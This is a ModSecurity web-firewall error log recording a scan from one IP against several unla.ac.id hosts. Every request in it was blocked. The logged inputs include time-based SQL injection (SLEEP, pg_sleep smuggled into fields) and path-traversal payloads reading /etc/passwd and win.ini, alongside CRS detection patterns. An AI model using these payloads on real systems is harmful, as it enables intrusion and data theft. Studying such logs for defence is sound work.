[Tue Aug 29 11:35:36.399319 2023] [:error] [pid 1300] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:fingerprint. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:fingerprint: (SELECT SLEEP(6))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11mMCo-f0AAAUUZ-0AAABK"]
[Tue Aug 29 11:36:24.477110 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:table_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ); --\\x22 found within ARGS:table_name: pg_user\\x22; select pg_sleep(6); --\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/api/v2/open/rowsInfo"] [unique_id "ZO11yMCo-f0AAAQSWQMAAAA0"]
[Tue Aug 29 11:36:24.506887 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO11yMCo-f0AAATQXmIAAAAO"]
[Tue Aug 29 11:36:24.521633 2023] [:error] [pid 1409] [client 143.42.78.27] ModSecurity: Rule 7fe1c67ac3c8 [id "981246"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "239"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "unla.ac.id"] [uri "/xmlpserver/services/XMLPService"] [unique_id "ZO11yMCo-f0AAAWBBPYAAAAB"]
[Tue Aug 29 11:36:24.523197 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../..// found within ARGS:file_name: ../../../../../..//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/cgi-bin/tsaupload.cgi"] [unique_id "ZO11yMCo-f0AAASEJcoAAAAE"]
[Tue Aug 29 11:36:24.615926 2023] [:error] [pid 1409] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11yMCo-f0AAAWBBPgAAAAB"]
[Tue Aug 29 11:36:24.641672 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../..// found within ARGS:file_name: ../../../../../..//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/tsaupload.cgi"] [unique_id "ZO11yMCo-f0AAASHiC0AAAAD"]
[Tue Aug 29 11:36:24.669288 2023] [:error] [pid 1409] [client 143.42.78.27] ModSecurity: Rule 7fe1c67ac3c8 [id "981246"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "239"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/xmlpserver/services/XMLPService"] [unique_id "ZO11yMCo-f0AAAWBBPoAAAAB"]
[Tue Aug 29 11:36:24.684159 2023] [:error] [pid 1285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11yMCo-f0AAAUFdg0AAAA9"]
[Tue Aug 29 11:36:24.697543 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:table_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ); --\\x22 found within ARGS:table_name: pg_user\\x22; select pg_sleep(6); --\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/api/v2/open/rowsInfo"] [unique_id "ZO11yMCo-f0AAASHiC8AAAAD"]
[Tue Aug 29 11:36:24.702723 2023] [:error] [pid 1278] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../..// found within ARGS:file_name: ../../../../../..//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/tsaupload.cgi"] [unique_id "ZO11yMCo-f0AAAT@KywAAAA2"]
[Tue Aug 29 11:36:24.710913 2023] [:error] [pid 1285] [client 143.42.78.27] ModSecurity: Rule 7fe1c67ac3c8 [id "981246"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "239"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "informatika.unla.ac.id"] [uri "/xmlpserver/services/XMLPService"] [unique_id "ZO11yMCo-f0AAAUFdg4AAAA9"]
[Tue Aug 29 11:36:24.801652 2023] [:error] [pid 1285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:table_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ); --\\x22 found within ARGS:table_name: pg_user\\x22; select pg_sleep(6); --\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/api/v2/open/rowsInfo"] [unique_id "ZO11yMCo-f0AAAUFdhEAAAA9"]
[Tue Aug 29 11:36:24.822529 2023] [:error] [pid 1285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO11yMCo-f0AAAUFdhIAAAA9"]
[Tue Aug 29 11:36:25.088154 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:table_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ); --\\x22 found within ARGS:table_name: pg_user\\x22; select pg_sleep(6); --\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/api/v2/open/rowsInfo"] [unique_id "ZO11ycCo-f0AAAUbg6EAAABQ"]
[Tue Aug 29 11:36:25.225165 2023] [:error] [pid 1409] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:table_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ); --\\x22 found within ARGS:table_name: pg_user\\x22; select pg_sleep(6); --\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/api/v2/open/rowsInfo"] [unique_id "ZO11ycCo-f0AAAWBBPwAAAAB"]
[Tue Aug 29 11:36:25.286397 2023] [:error] [pid 1409] [client 143.42.78.27] ModSecurity: Rule 7fe1c67ac3c8 [id "981246"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "239"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/xmlpserver/services/XMLPService"] [unique_id "ZO11ycCo-f0AAAWBBP8AAAAB"]
[Tue Aug 29 11:36:25.580499 2023] [:error] [pid 1423] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11ycCo-f0AAAWPpXQAAAAH"]
[Tue Aug 29 11:36:25.654728 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../..// found within ARGS:file_name: ../../../../../..//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/tsaupload.cgi"] [unique_id "ZO11ycCo-f0AAATQXmcAAAAO"]
[Tue Aug 29 11:36:25.695415 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../..// found within ARGS:file_name: ../../../../../..//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/tsaupload.cgi"] [unique_id "ZO11ycCo-f0AAATQXmkAAAAO"]
[Tue Aug 29 11:36:25.750493 2023] [:error] [pid 1423] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11ycCo-f0AAAWPpXsAAAAH"]
[Tue Aug 29 11:36:26.041103 2023] [:error] [pid 1423] [client 143.42.78.27] ModSecurity: Rule 7fe1c67ac3c8 [id "981246"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "239"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "pusatbahasa.unla.ac.id"] [uri "/xmlpserver/services/XMLPService"] [unique_id "ZO11ysCo-f0AAAWPpX8AAAAH"]
[Tue Aug 29 11:36:26.064614 2023] [:error] [pid 1434] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11ysCo-f0AAAWa-UEAAAAI"]
[Tue Aug 29 11:36:26.075227 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11ysCo-f0AAAUbg6sAAABQ"]
[Tue Aug 29 11:36:26.097358 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11ysCo-f0AAAUbg6wAAABQ"]
[Tue Aug 29 11:36:26.593468 2023] [:error] [pid 1436] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11ysCo-f0AAAWcCPsAAAAL"]
[Tue Aug 29 11:36:27.540574 2023] [:error] [pid 1444] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../..// found within ARGS:file_name: ../../../../../..//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/tsaupload.cgi"] [unique_id "ZO11y8Co-f0AAAWkfS4AAAAQ"]
[Tue Aug 29 11:36:27.541701 2023] [:error] [pid 1446] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11y8Co-f0AAAWmoc0AAAAS"]
[Tue Aug 29 11:36:27.545321 2023] [:error] [pid 1448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:table_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ); --\\x22 found within ARGS:table_name: pg_user\\x22; select pg_sleep(6); --\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/api/v2/open/rowsInfo"] [unique_id "ZO11y8Co-f0AAAWoVzcAAAAV"]
[Tue Aug 29 11:36:27.546236 2023] [:error] [pid 1449] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11y8Co-f0AAAWpXfsAAAAW"]
[Tue Aug 29 11:36:27.549439 2023] [:error] [pid 1450] [client 143.42.78.27] ModSecurity: Rule 7fe1c67ac3c8 [id "981246"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "239"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "www.unla.ac.id"] [uri "/xmlpserver/services/XMLPService"] [unique_id "ZO11y8Co-f0AAAWqun4AAAAX"]
[Tue Aug 29 11:36:28.403127 2023] [:error] [pid 1405] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ccmivr/IVRGetAudioFile.do"] [unique_id "ZO11zMCo-f0AAAV9byUAAAAA"]
[Tue Aug 29 11:36:28.421256 2023] [:error] [pid 1445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/ccmivr/IVRGetAudioFile.do"] [unique_id "ZO11zMCo-f0AAAWlCa8AAAAR"]
[Tue Aug 29 11:36:28.423316 2023] [:error] [pid 1405] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/ccmivr/IVRGetAudioFile.do"] [unique_id "ZO11zMCo-f0AAAV9byYAAAAA"]
[Tue Aug 29 11:36:28.434743 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/ccmivr/IVRGetAudioFile.do"] [unique_id "ZO11zMCo-f0AAASEJdQAAAAE"]
[Tue Aug 29 11:36:28.441421 2023] [:error] [pid 1444] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:true_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:true_path: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php/Pan/ShareUrl/downloadSharedFile"] [unique_id "ZO11zMCo-f0AAAWkfTEAAAAQ"]
[Tue Aug 29 11:36:28.451307 2023] [:error] [pid 1446] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:true_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:true_path: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php/Pan/ShareUrl/downloadSharedFile"] [unique_id "ZO11zMCo-f0AAAWmodcAAAAS"]
[Tue Aug 29 11:36:28.453110 2023] [:error] [pid 1436] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:true_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:true_path: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php/Pan/ShareUrl/downloadSharedFile"] [unique_id "ZO11zMCo-f0AAAWcCQsAAAAL"]
[Tue Aug 29 11:36:28.456462 2023] [:error] [pid 1448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:true_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:true_path: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php/Pan/ShareUrl/downloadSharedFile"] [unique_id "ZO11zMCo-f0AAAWoV0cAAAAV"]
[Tue Aug 29 11:36:28.463021 2023] [:error] [pid 1444] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:true_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:true_path: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php/Pan/ShareUrl/downloadSharedFile"] [unique_id "ZO11zMCo-f0AAAWkfTIAAAAQ"]
[Tue Aug 29 11:36:28.464260 2023] [:error] [pid 1405] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/ccmivr/IVRGetAudioFile.do"] [unique_id "ZO11zMCo-f0AAAV9bygAAAAA"]
